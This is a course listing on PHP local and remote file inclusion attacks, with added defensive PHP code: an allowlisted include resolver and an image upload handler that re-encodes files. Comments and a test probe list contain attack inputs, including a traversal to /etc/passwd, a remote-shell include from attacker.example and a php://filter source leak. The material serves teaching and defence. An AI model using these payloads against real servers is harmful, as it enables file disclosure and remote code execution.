Local and Remote File Inclusion
How to prevent LFI and RFI attacks
“PHP is used by 82.5% of the websites…”
Taught by: Peter Zsiros
Length: 1.5 hours
Local and Remote File Inclusion (LFI/RFI) attacks are popular amongst attackers. They mostly affect web applications written in PHP, so a great majority of websites could be exposed to them.
In this minicourse we will examine how this technique works and how to avoid running someone else's malicious code on your server. We will cover the mitigation techniques against this type of attack, and the different ways a backdoor can be "uploaded" so that it can later be included: upload forms, database writes, log poisoning, session files and the HTTP PUT method.
------------------------------
Recommended for
It can be very useful for web developers so that they can make more secure websites, and for ethical hackers so that they can make thorough penetration tests. It can also be useful for system administrators and testers.
Prerequisites
Basic programming knowledge, basic knowledge of HTTP protocol.
Technical requirements
Minimum 4GB memory
Acquired skills
You will be able to identify and exploit these kinds of vulnerabilities, and you will learn how to avoid them, including the PHP and web server configuration options that reduce the attack surface.
Curriculum and videos
Section 1 - Introduction to LFI/RFI
First we install our test environment. (For this you can download the virtual machine and the ISO image from http://www.duckademy.com/downloads.) Then we hunt for a remote and a local file inclusion vulnerability. With the help of the examples you will understand the reason behind these kinds of vulnerabilities.
- Virtual lab and downloads info.pdf
- How LFI and RFI work.pdf step-by-step manual, 42 pages
- Video 1 - Setting up our test environment.mp4 6:11, 26MB
- Video 2 - Introduction to LFI and RFI vulnerabilities.mp4 19:22, 58MB
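The root cause the section above refers to is an include whose path is built from request input. The following is an added example, not code from the course or its lab virtual machine: the vulnerable sink next to a hardened version that maps the parameter to a fixed allowlist and then verifies the resolved path with realpath(). The pages/ directory, the page names and the probe strings are assumptions made for the illustration.

```php
<?php
// Added example (not from the course): a vulnerable include beside a hardened one.
// Assumed layout: includable pages live in ./pages/ as <name>.php (an assumption).

declare(strict_types=1);

// --- Vulnerable: the classic LFI/RFI sink.
// ?page=../../../../etc/passwd reads arbitrary local files (LFI);
// with allow_url_include=On, ?page=http://attacker.example/shell.txt executes remote code (RFI);
// ?page=php://filter/convert.base64-encode/resource=index.php leaks source even with URLs disabled.
function vulnerableInclude(): void
{
    include $_GET['page'];
}

// --- Hardened: the request parameter is only ever a *key* into a fixed map,
// so traversal sequences, URLs and php:// wrappers never become part of a path.
const PAGE_DIR      = __DIR__ . '/pages';
const ALLOWED_PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

/**
 * Returns the absolute path to include, or null when the request must be refused.
 */
function resolvePage(?string $requested): ?string
{
    if ($requested === null || !isset(ALLOWED_PAGES[$requested])) {
        return null;                                   // unknown key: refuse, never fall back to the raw input
    }
    $candidate = PAGE_DIR . '/' . ALLOWED_PAGES[$requested];
    $real      = realpath($candidate);                 // resolves symlinks and ../ ; false if the file is missing
    $base      = realpath(PAGE_DIR);
    // Defence in depth: even if the allowlist is edited carelessly later, the final path must sit under PAGE_DIR.
    if ($real === false || $base === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

function hardenedInclude(): void
{
    $path = resolvePage($_GET['page'] ?? 'home');
    if ($path === null) {
        http_response_code(404);
        exit('No such page');
    }
    include $path;
}

// Self-check with constructed attack inputs; run with `php lfi.php` on the CLI, no web server needed.
// 'home' resolves only if ./pages/home.php actually exists; every other probe is refused.
if (PHP_SAPI === 'cli') {
    $probes = [
        'home',
        '../../../../etc/passwd',
        'http://attacker.example/shell.txt',
        'php://filter/convert.base64-encode/resource=index.php',
        "home\0.jpg",
    ];
    foreach ($probes as $p) {
        printf("%-55s -> %s\n", addcslashes($p, "\0"), resolvePage($p) ?? 'refused');
    }
}
```

The configuration side belongs next to the code fix, not instead of it: keep allow_url_include=Off (its default since PHP 5.2, and the directive is deprecated as of 7.4), set allow_url_fopen=Off unless the application genuinely fetches URLs, and use open_basedir so that even a remaining include bug cannot reach /etc, the web server logs or the session directory.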
Section 2 - Backdoor upload techniques
We examine different ways to get a backdoor onto the server so that our code can then be called through the LFI attack. We will upload backdoors through upload forms that perform different kinds of image validation, upload a file when the HTTP PUT method is enabled, and insert a backdoor when we can write to a database. We will also plant a backdoor when there is no dedicated write channel at all (for example log file poisoning).
- Video 3 - Uploading backdoors through upload forms.mp4 27:41, 108MB
- Video 4 - Other upload techniques.mp4 31:05, 103MB
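The image-validation bypasses listed above all depend on the server keeping the uploaded bytes and the client-chosen name. Below is an added example, not code from the course, of an upload handler that removes both: it derives the type from the file contents, re-encodes the picture with GD so embedded PHP in EXIF or trailing data does not survive, and stores the result under a random name outside the web root. The GD extension, the /var/app/uploads path and the `image` form field are assumptions for the illustration.

```php
<?php
// Added example (not part of the course material): an upload handler that survives
// the usual "it passed the image check" tricks. Assumptions: the GD extension is loaded
// and UPLOAD_DIR is a directory the web server does not serve or execute from.

declare(strict_types=1);

const UPLOAD_DIR = '/var/app/uploads';            // assumed path, outside the document root
const MAX_BYTES  = 2 * 1024 * 1024;

/**
 * Validates and stores one uploaded image; returns the stored filename or throws.
 * $file is one entry of $_FILES (e.g. $_FILES['image']).
 */
function storeImage(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if (!is_uploaded_file($file['tmp_name'])) {    // refuses paths not produced by this request's upload
        throw new RuntimeException('not an uploaded file');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('too large');
    }

    // 1. Decide the type from the bytes, never from the client-supplied name or Content-Type header.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    $ext   = ['image/jpeg' => 'jpg', 'image/png' => 'png'][$mime] ?? null;
    if ($ext === null) {
        throw new RuntimeException('unsupported type');
    }

    // 2. A magic-number or getimagesize() check alone is not enough: a real JPEG can carry
    //    "<?php ... ?>" in an EXIF comment, and "GIF89a<?php ..." passes header checks.
    //    Re-encoding with GD yields a fresh file that keeps the pixels and drops everything else.
    $img = $ext === 'jpg'
        ? @imagecreatefromjpeg($file['tmp_name'])
        : @imagecreatefrompng($file['tmp_name']);
    if ($img === false) {
        throw new RuntimeException('not a decodable image');
    }

    // 3. Never reuse the client's filename: shell.php.jpg, "shell.php\0.jpg", .htaccess and
    //    ../ traversal all disappear when the name is generated server-side.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = UPLOAD_DIR . '/' . $name;
    $ok   = $ext === 'jpg' ? imagejpeg($img, $dest, 85) : imagepng($img, $dest);
    imagedestroy($img);
    if (!$ok) {
        throw new RuntimeException('could not write image');
    }
    chmod($dest, 0640);                               // readable by the app, not executable, not world-readable
    return $name;
}

// Hand stored images back through a reader script (or a static location with PHP disabled);
// never include() them, so an LFI elsewhere cannot turn an upload into code execution.
if (PHP_SAPI !== 'cli' && ($_SERVER['REQUEST_METHOD'] ?? '') === 'POST' && isset($_FILES['image'])) {
    header('Content-Type: application/json');
    try {
        echo json_encode(['stored' => storeImage($_FILES['image'])]);
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo json_encode(['error' => $e->getMessage()]);
    }
}
```

The other write channels from the section get the same treatment at the configuration layer: refuse methods the application does not use (on Apache, a `<LimitExcept GET POST HEAD>` block with `Require all denied` stops PUT), and keep access logs, error logs and the session save path outside open_basedir so that a poisoned log or session file is not reachable by include() in the first place.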